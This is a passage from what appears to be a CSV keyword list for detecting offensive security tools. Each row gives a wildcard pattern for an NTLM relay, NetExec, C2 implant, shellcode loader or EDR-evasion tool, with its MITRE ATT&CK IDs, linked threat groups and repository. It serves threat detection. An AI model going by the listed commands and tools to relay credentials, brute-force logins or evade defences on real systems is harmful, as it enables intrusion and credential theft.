-*ntlm.py *,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z
-*ntlm_info_enumeration.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*NTLMChallengeBase64*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - 
Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-Tater.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*NTLMChallengeBase64*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*ntlm-info.py*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - 
TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,1,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z
-*ntlmquic.*,offensive_tool_keyword,ntlmquic,POC tools for exploring SMB over QUIC protocol,T1210.002 - T1210.003 - T1210.004,TA0001,N/A,N/A,Network Exploitation tools,https://github.com/xpn/ntlmquic,1,1,N/A,N/A,2,114,15,2022-04-06T11:22:11Z,2022-04-05T13:01:02Z
-*ntlmquic-go*,offensive_tool_keyword,ntlmquic,POC tools for exploring SMB over QUIC protocol,T1210.002 - T1210.003 - T1210.004,TA0001,N/A,N/A,Network Exploitation tools,https://github.com/xpn/ntlmquic,1,1,N/A,N/A,2,114,15,2022-04-06T11:22:11Z,2022-04-05T13:01:02Z
-*ntlmquic-master*,offensive_tool_keyword,ntlmquic,POC tools for exploring SMB over QUIC protocol,T1210.002 - T1210.003 - T1210.004,TA0001,N/A,N/A,Network Exploitation tools,https://github.com/xpn/ntlmquic,1,1,N/A,N/A,2,114,15,2022-04-06T11:22:11Z,2022-04-05T13:01:02Z
-*ntlmrecon *,offensive_tool_keyword,NTMLRecon,A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains,T1595,TA0009,N/A,N/A,Network Exploitation tools,https://github.com/pwnfoo/NTLMRecon,1,0,N/A,N/A,5,419,67,2023-08-31T05:39:48Z,2019-12-01T06:06:30Z
-*ntlmrecon.csv*,offensive_tool_keyword,NTMLRecon,A fast and flexible NTLM reconnaissance tool without external dependencies. 
Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains,T1595,TA0009,N/A,N/A,Network Exploitation tools,https://github.com/pwnfoo/NTLMRecon,1,1,N/A,N/A,5,419,67,2023-08-31T05:39:48Z,2019-12-01T06:06:30Z
-*ntlmrecon:main*,offensive_tool_keyword,NTMLRecon,Enumerate information from NTLM authentication enabled web endpoints,T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001,TA0009 - TA0007 - TA0006,N/A,N/A,Discovery,https://github.com/puzzlepeaches/NTLMRecon,1,0,N/A,8,1,32,3,2023-08-16T14:34:10Z,2023-08-09T12:10:42Z
-*ntlmrecon-fromfile.csv*,offensive_tool_keyword,NTMLRecon,A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains,T1595,TA0009,N/A,N/A,Network Exploitation tools,https://github.com/pwnfoo/NTLMRecon,1,1,N/A,N/A,5,419,67,2023-08-31T05:39:48Z,2019-12-01T06:06:30Z
-*NTLMRecon-master*,offensive_tool_keyword,NTMLRecon,Enumerate information from NTLM authentication enabled web endpoints,T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001,TA0009 - TA0007 - TA0006,N/A,N/A,Discovery,https://github.com/puzzlepeaches/NTLMRecon,1,1,N/A,8,1,32,3,2023-08-16T14:34:10Z,2023-08-09T12:10:42Z
-*ntlmrecon-ranges.csv*,offensive_tool_keyword,NTMLRecon,A fast and flexible NTLM reconnaissance tool without external dependencies. 
Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains,T1595,TA0009,N/A,N/A,Network Exploitation tools,https://github.com/pwnfoo/NTLMRecon,1,1,N/A,N/A,5,419,67,2023-08-31T05:39:48Z,2019-12-01T06:06:30Z
-*NTLMRelay2Self.git*,offensive_tool_keyword,NTLMRelay2Self,An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).,T1078 - T1078.004 - T1557 - T1557.001 - T1068,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/med0x2e/NTLMRelay2Self,1,1,N/A,10,4,349,45,2022-04-30T19:02:06Z,2022-04-30T10:05:02Z
-*ntlmrelayx -*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*ntlmrelayx --*,offensive_tool_keyword,AD exploitation cheat sheet,Example command to relay the hash to authenticate as local admin (if the service account has these privileges) and run calc.exe. Omit the -c parameter to attempt a secretsdump instead.,T1550 - T1555 - T1212 - T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*ntlmrelayx.*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z
-*ntlmrelayx.py.log*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z
-*ntlmscan.py*,offensive_tool_keyword,ntlmscan,scan for NTLM directories,T1087 - T1083,TA0006,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/ntlmscan,1,1,N/A,N/A,4,303,52,2023-05-24T05:11:27Z,2019-10-23T06:02:56Z
-*ntlmscan-master.zip*,offensive_tool_keyword,ntlmscan,scan for NTLM directories,T1087 - T1083,TA0006,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/ntlmscan,1,1,N/A,N/A,4,303,52,2023-05-24T05:11:27Z,2019-10-23T06:02:56Z
-*ntlmv1.py --ntlmv1 *::*,offensive_tool_keyword,NetNTLMtoSilverTicket,Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.,T1110.001 - T1558.003 - T1558.004,TA0006 - TA0008 - TA0002,N/A,N/A,Credential Access,https://github.com/NotMedic/NetNTLMtoSilverTicket,1,0,N/A,10,7,635,105,2021-07-26T15:16:20Z,2019-01-14T15:32:27Z
-*ntlmv1.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z
-*ntlmv1_check*,offensive_tool_keyword,linWinPwn,linWinPwn is 
a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z
-*ntlmv1-multi --ntlmv1 *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*NtoskrnlOffsets.csv*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,0,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z
-*NtRemoteLoad-main*,offensive_tool_keyword,NtRemoteLoad,Remote Shellcode Injector,T1055 - T1027 - T1218.010,TA0002 - TA0005 - TA0010,N/A,N/A,Exploitation tool,https://github.com/florylsk/NtRemoteLoad,1,1,N/A,10,2,173,35,2023-08-27T17:14:44Z,2023-08-27T16:52:31Z
-*ntrights.exe*,offensive_tool_keyword,NtRights,tool for adding privileges from the commandline,T1548.002 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/gtworek/PSBits/tree/master/NtRights,1,1,N/A,7,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z
-*NtUserMNDragOverExploit*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*NtWa1tF0rS1ngle0bj3ct Executed*,offensive_tool_keyword,NTDLLReflection,Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table,T1055.012 - T1574.002 - T1027.001 - T1218.011,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/NTDLLReflection,1,0,N/A,9,3,278,42,2023-08-02T02:21:43Z,2023-02-03T17:12:33Z
-*Nuages*/Implants*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z
-*nuages.clearImplants *,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,0,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z
-*nuages.getAutoruns*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z
-*nuages.getImplants*,offensive_tool_keyword,Nuages,A modular C2 
framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z
-*nuages.getListeners*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z
-*nuages.printImplants*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z
-*nuages.printListeners*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z
-*nuages_cli.js*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z
-*NuagesC2Connector*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z
-*NuagesC2Implant*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z
-*NuagesPythonImplant*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*NuagesSharpImplant*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*nuclei -t ~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml -l https.txt*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*nuclei -t workflows/bigip-pwner-workflow.yaml*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*nuclei -u *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*nuclei-burp-plugin*,offensive_tool_keyword,Xerror,A BurpSuite plugin intended to help with nuclei template generation.,T1583 T1595 T1190,N/A,N/A,N/A,Network Exploitation tools,https://github.com/projectdiscovery/nuclei-burp-plugin,1,1,N/A,N/A,10,955,102,2023-09-15T10:49:09Z,2022-01-17T10:31:33Z -*Nuke_Privileges /Process:*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*NUL0x4C/APCLdr*,offensive_tool_keyword,APCLdr,APCLdr: Payload Loader With Evasion Features,T1027 - T1055 - T1055.002 
- T1055.003 - T1070 - T1070.004 - T1071 - T1106 - T1574.001,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/NUL0x4C/APCLdr,1,1,N/A,N/A,3,285,51,2023-01-22T04:24:33Z,2023-01-21T18:09:36Z -*NUL0x4C/AtomLdr*,offensive_tool_keyword,AtomLdr,A DLL loader with advanced evasive features,T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002,TA0011 - TA0006 - TA0002 - TA0008 - TA0007,N/A,N/A,Exploitation tools,https://github.com/NUL0x4C/AtomLdr,1,1,N/A,N/A,6,543,78,2023-02-26T19:57:09Z,2023-02-26T17:59:26Z -*null-byte.com/bypass-amsi*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005 ,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,1,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*NullSessionScanner.*,offensive_tool_keyword,pingcastle,active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands,T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071,TA0006 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation tools,https://github.com/vletoux/pingcastle,1,1,N/A,N/A,10,1859,249,2023-09-18T17:29:51Z,2018-08-31T17:42:48Z -*nxc ftp *bruteforce*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*nxc http *--port*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential 
Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*nxc ldap * --admin-count*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*nxc ldap * --trusted-for-delegation*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*nxc mssql *--get-file*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*nxc mssql *--local-auth*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*nxc ssh *,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*nxc winrm * -X 
*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*nysm.skel.h*,offensive_tool_keyword,nysm,nysm is a stealth post-exploitation container,T1610 - T1037 - T1070,TA0005 - TA0002 - TA0003,N/A,N/A,POST Exploitation tools,https://github.com/eeriedusk/nysm,1,0,N/A,10,1,30,3,2023-09-30T21:17:33Z,2023-09-25T10:03:52Z -*nysm-master.zip*,offensive_tool_keyword,nysm,nysm is a stealth post-exploitation container,T1610 - T1037 - T1070,TA0005 - TA0002 - TA0003,N/A,N/A,POST Exploitation tools,https://github.com/eeriedusk/nysm,1,1,N/A,10,1,30,3,2023-09-30T21:17:33Z,2023-09-25T10:03:52Z -*nyxgeek*,offensive_tool_keyword,Github Username,github user hosting exploitation and recon tools,N/A,N/A,N/A,N/A,Information Gathering,https://github.com/nyxgeek,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*nyxgeek/lyncsmash*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,1,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*nyxgeek/ntlmscan*,offensive_tool_keyword,ntlmscan,scan for NTLM directories,T1087 - T1083,TA0006,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/ntlmscan,1,1,N/A,N/A,4,303,52,2023-05-24T05:11:27Z,2019-10-23T06:02:56Z -*nyxgeek/teamstracker*,offensive_tool_keyword,teamstracker,using graph proxy to monitor teams user presence,T1552.007 - T1052.001 - T1602,TA0003 - TA0005 - TA0007,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/teamstracker,1,1,N/A,3,1,46,3,2023-08-25T15:07:14Z,2023-08-15T03:41:46Z -*-o kitten.exe*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. 
It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,0,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*o_getprivs*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*o365-Attack-Toolkit*,offensive_tool_keyword,365-Stealer,365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack,T1111 - T1566.001 - T1078.004,TA0004 - TA0001 - TA0040,N/A,N/A,Phishing,https://github.com/AlteredSecurity/365-Stealer,1,0,N/A,10,3,288,74,2023-06-15T19:56:12Z,2020-09-20T18:22:36Z -*o365-attack-toolkit*,offensive_tool_keyword,o365-attack-toolkit,A toolkit to attack Office365,T1110 - T1114 - T1119 - T1197 - T1087.002,TA0001 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/mdsecactivebreach/o365-attack-toolkit,1,1,N/A,10,10,954,218,2020-11-06T12:09:26Z,2019-07-22T10:39:46Z -*o365creeper.git*,offensive_tool_keyword,o365creeper,Python script that performs email address validation against Office 365 without submitting login attempts,T1592.002 - T1596,TA0007,N/A,N/A,Network Exploitation tools,https://github.com/LMGsec/o365creeper,1,1,N/A,N/A,3,265,57,2020-08-07T17:40:41Z,2019-07-12T21:32:05Z -*o365creeper.py*,offensive_tool_keyword,o365creeper,Python script that performs email address validation against Office 365 without submitting login 
